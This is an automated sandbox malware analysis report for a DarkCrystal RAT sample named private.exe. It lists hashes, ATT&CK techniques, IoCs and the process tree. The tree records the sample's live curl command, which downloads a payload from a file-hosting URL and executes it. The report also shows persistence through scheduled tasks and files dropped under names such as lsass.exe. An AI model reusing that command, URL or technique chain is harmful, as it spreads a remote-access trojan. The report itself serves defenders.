dcrat | 2ee5d62e9112121eeb1c152fc6a0a5319c8ebfa30ab49eeecba49a6b945feefb

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
15-01-2025 01:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

private.exe
Size

854KB
MD5

9b76a571d37a4d6b4507642a85674cc9
SHA1

e2cf7359c93b5de6f08566b7457ae13ec47b9f3f
SHA256

2ee5d62e9112121eeb1c152fc6a0a5319c8ebfa30ab49eeecba49a6b945feefb
SHA512

a98b338aec862c78a56836d29903897343ac0987089e6252abe42b0212438f44525319d0d92811744f49c4b52a08a901866c20a4b9f39041aa8075837ebd1733
SSDEEP

12288:lu47xRm/JGQl6CwkoH7Fso6veRSN2ff+zOe9egX7AlGeyn2rnIr9BqiXb1FP:lu47SBR6CwkTo60OegX7Aoeyn4m7Vj

Score

10^/10

dcrat defense_evasion discovery infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5068	5044	schtasks.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3988	5044	schtasks.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3872	5044	schtasks.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	840	5044	schtasks.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2600	5044	schtasks.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	812	5044	schtasks.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4244	5044	schtasks.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4168	5044	schtasks.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3132	5044	schtasks.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4292	5044	schtasks.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4624	5044	schtasks.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3708	5044	schtasks.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3712	5044	schtasks.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4124	5044	schtasks.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2616	5044	schtasks.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4552	5044	schtasks.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4896	5044	schtasks.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4116	5044	schtasks.exe	94

Downloads MZ/PE file

Checks computer location settings 2 TTPs 18 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	chainreviewwinrefSvc.exe

Executes dropped EXE 17 IoCs

pid	Process
536	client.exe
1448	chainreviewwinrefSvc.exe
1296	chainreviewwinrefSvc.exe
4048	chainreviewwinrefSvc.exe
2288	chainreviewwinrefSvc.exe
4852	chainreviewwinrefSvc.exe
2260	chainreviewwinrefSvc.exe
616	chainreviewwinrefSvc.exe
2192	chainreviewwinrefSvc.exe
1220	chainreviewwinrefSvc.exe
4928	chainreviewwinrefSvc.exe
1884	chainreviewwinrefSvc.exe
3012	chainreviewwinrefSvc.exe
4896	chainreviewwinrefSvc.exe
2376	chainreviewwinrefSvc.exe
1804	chainreviewwinrefSvc.exe
400	chainreviewwinrefSvc.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Common Files\System\c119943affd730	chainreviewwinrefSvc.exe
File created	C:\Program Files (x86)\Common Files\System\private.exe	chainreviewwinrefSvc.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Speech\client.exe	curl.exe
File created	C:\Windows\WaaS\services\lsass.exe	chainreviewwinrefSvc.exe
File created	C:\Windows\ShellExperiences\sysmon.exe	chainreviewwinrefSvc.exe
File created	C:\Windows\ShellExperiences\121e5b5079f7c0	chainreviewwinrefSvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 7 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3664	PING.EXE
1784	PING.EXE
3908	PING.EXE
5084	PING.EXE
4580	PING.EXE
4156	PING.EXE
4996	PING.EXE

Modifies registry class 17 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	client.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	chainreviewwinrefSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	chainreviewwinrefSvc.exe

Runs ping.exe 1 TTPs 7 IoCs

Remote System Discovery

T1018

pid	Process
4996	PING.EXE
3664	PING.EXE
1784	PING.EXE
3908	PING.EXE
5084	PING.EXE
4580	PING.EXE
4156	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3132	schtasks.exe
4292	schtasks.exe
4624	schtasks.exe
4124	schtasks.exe
4896	schtasks.exe
3988	schtasks.exe
4244	schtasks.exe
4552	schtasks.exe
4168	schtasks.exe
3712	schtasks.exe
3708	schtasks.exe
2616	schtasks.exe
5068	schtasks.exe
2600	schtasks.exe
812	schtasks.exe
4116	schtasks.exe
3872	schtasks.exe
840	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2216	private.exe
2216	private.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe
1448	chainreviewwinrefSvc.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	1448	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	1296	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	4048	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	2288	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	4852	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	2260	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	616	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	2192	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	1220	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	4928	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	1884	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	3012	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	4896	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	2376	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	1804	chainreviewwinrefSvc.exe
Token: SeDebugPrivilege	400	chainreviewwinrefSvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2216 wrote to memory of 2012	2216	private.exe	84
PID 2216 wrote to memory of 2012	2216	private.exe	84
PID 2216 wrote to memory of 384	2216	private.exe	85
PID 2216 wrote to memory of 384	2216	private.exe	85
PID 384 wrote to memory of 1232	384	cmd.exe	86
PID 384 wrote to memory of 1232	384	cmd.exe	86
PID 2216 wrote to memory of 2724	2216	private.exe	87
PID 2216 wrote to memory of 2724	2216	private.exe	87
PID 2724 wrote to memory of 536	2724	cmd.exe	88
PID 2724 wrote to memory of 536	2724	cmd.exe	88
PID 2724 wrote to memory of 536	2724	cmd.exe	88
PID 536 wrote to memory of 4960	536	client.exe	89
PID 536 wrote to memory of 4960	536	client.exe	89
PID 536 wrote to memory of 4960	536	client.exe	89
PID 2216 wrote to memory of 4380	2216	private.exe	90
PID 2216 wrote to memory of 4380	2216	private.exe	90
PID 4960 wrote to memory of 1696	4960	WScript.exe	98
PID 4960 wrote to memory of 1696	4960	WScript.exe	98
PID 4960 wrote to memory of 1696	4960	WScript.exe	98
PID 1696 wrote to memory of 1448	1696	cmd.exe	100
PID 1696 wrote to memory of 1448	1696	cmd.exe	100
PID 1448 wrote to memory of 2960	1448	chainreviewwinrefSvc.exe	119
PID 1448 wrote to memory of 2960	1448	chainreviewwinrefSvc.exe	119
PID 2960 wrote to memory of 3060	2960	cmd.exe	121
PID 2960 wrote to memory of 3060	2960	cmd.exe	121
PID 2960 wrote to memory of 5084	2960	cmd.exe	122
PID 2960 wrote to memory of 5084	2960	cmd.exe	122
PID 2960 wrote to memory of 1296	2960	cmd.exe	124
PID 2960 wrote to memory of 1296	2960	cmd.exe	124
PID 1296 wrote to memory of 2012	1296	chainreviewwinrefSvc.exe	125
PID 1296 wrote to memory of 2012	1296	chainreviewwinrefSvc.exe	125
PID 2012 wrote to memory of 4912	2012	cmd.exe	127
PID 2012 wrote to memory of 4912	2012	cmd.exe	127
PID 2012 wrote to memory of 4580	2012	cmd.exe	128
PID 2012 wrote to memory of 4580	2012	cmd.exe	128
PID 2012 wrote to memory of 4048	2012	cmd.exe	130
PID 2012 wrote to memory of 4048	2012	cmd.exe	130
PID 4048 wrote to memory of 704	4048	chainreviewwinrefSvc.exe	131
PID 4048 wrote to memory of 704	4048	chainreviewwinrefSvc.exe	131
PID 704 wrote to memory of 3428	704	cmd.exe	133
PID 704 wrote to memory of 3428	704	cmd.exe	133
PID 704 wrote to memory of 224	704	cmd.exe	134
PID 704 wrote to memory of 224	704	cmd.exe	134
PID 704 wrote to memory of 2288	704	cmd.exe	135
PID 704 wrote to memory of 2288	704	cmd.exe	135
PID 2288 wrote to memory of 1748	2288	chainreviewwinrefSvc.exe	136
PID 2288 wrote to memory of 1748	2288	chainreviewwinrefSvc.exe	136
PID 1748 wrote to memory of 2896	1748	cmd.exe	138
PID 1748 wrote to memory of 2896	1748	cmd.exe	138
PID 1748 wrote to memory of 5000	1748	cmd.exe	139
PID 1748 wrote to memory of 5000	1748	cmd.exe	139
PID 1748 wrote to memory of 4852	1748	cmd.exe	140
PID 1748 wrote to memory of 4852	1748	cmd.exe	140
PID 4852 wrote to memory of 2552	4852	chainreviewwinrefSvc.exe	141
PID 4852 wrote to memory of 2552	4852	chainreviewwinrefSvc.exe	141
PID 2552 wrote to memory of 3172	2552	cmd.exe	143
PID 2552 wrote to memory of 3172	2552	cmd.exe	143
PID 2552 wrote to memory of 4156	2552	cmd.exe	144
PID 2552 wrote to memory of 4156	2552	cmd.exe	144
PID 2552 wrote to memory of 2260	2552	cmd.exe	145
PID 2552 wrote to memory of 2260	2552	cmd.exe	145
PID 2260 wrote to memory of 1692	2260	chainreviewwinrefSvc.exe	146
PID 2260 wrote to memory of 1692	2260	chainreviewwinrefSvc.exe	146
PID 1692 wrote to memory of 2760	1692	cmd.exe	148

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\private.exe
"C:\Users\Admin\AppData\Local\Temp\private.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:384
- - C:\Windows\system32\curl.exe
    curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe
    3⤵
    - Drops file in Windows directory
    PID:1232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\Speech\client.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2724
- - C:\Windows\Speech\client.exe
    C:\Windows\Speech\client.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:536
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ComponentCrt\sBEZl9whlNx1coUjXXPbcOghFKEeD7haTOPQzUr4aUDA.vbe"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4960
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ComponentCrt\1lvoZv4qBcC2Me4L.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1696
      - C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt/chainreviewwinrefSvc.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1448
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cmDFbQQIZ6.bat"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2960
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:3060
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5084
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1296
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\02n8fxtMT9.bat"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:2012
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:4912
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4580
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4048
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1v3DIijE8M.bat"
        11⤵
        Suspicious use of WriteProcessMemory
        
        PID:704
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:3428
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        12⤵
        
        PID:224
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2288
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7sJHAbaLmY.bat"
        13⤵
        Suspicious use of WriteProcessMemory
        
        PID:1748
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:2896
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        14⤵
        
        PID:5000
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4852
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\JRGN3N9ZXF.bat"
        15⤵
        Suspicious use of WriteProcessMemory
        
        PID:2552
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:3172
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4156
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2260
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wykhLflpMg.bat"
        17⤵
        Suspicious use of WriteProcessMemory
        
        PID:1692
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:2760
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        18⤵
        
        PID:4196
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:616
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9mWviDJuKI.bat"
        19⤵
        
        PID:4720
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:2588
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4996
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:2192
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aqn4VxW4jp.bat"
        21⤵
        
        PID:4324
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:4484
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3664
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        22⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1220
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nE1uIQLIWX.bat"
        23⤵
        
        PID:1216
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        24⤵
        
        PID:964
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        24⤵
        
        PID:2028
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        24⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:4928
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lkMeKtMa8h.bat"
        25⤵
        
        PID:2200
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        26⤵
        
        PID:3476
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        26⤵
        
        PID:3400
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        26⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:1884
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2vzlDYcv1s.bat"
        27⤵
        
        PID:4808
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        28⤵
        
        PID:1556
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        28⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1784
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        28⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:3012
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7sJHAbaLmY.bat"
        29⤵
        
        PID:3728
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        30⤵
        
        PID:452
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        30⤵
        
        PID:2160
        
        C:\ComponentCrt\chainreviewwinrefSvc.exe
        
        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
        30⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:4896
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tV5RM9l7zq.bat"
        31⤵
        
        PID:2808
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        32⤵
        
        PID:3452
        
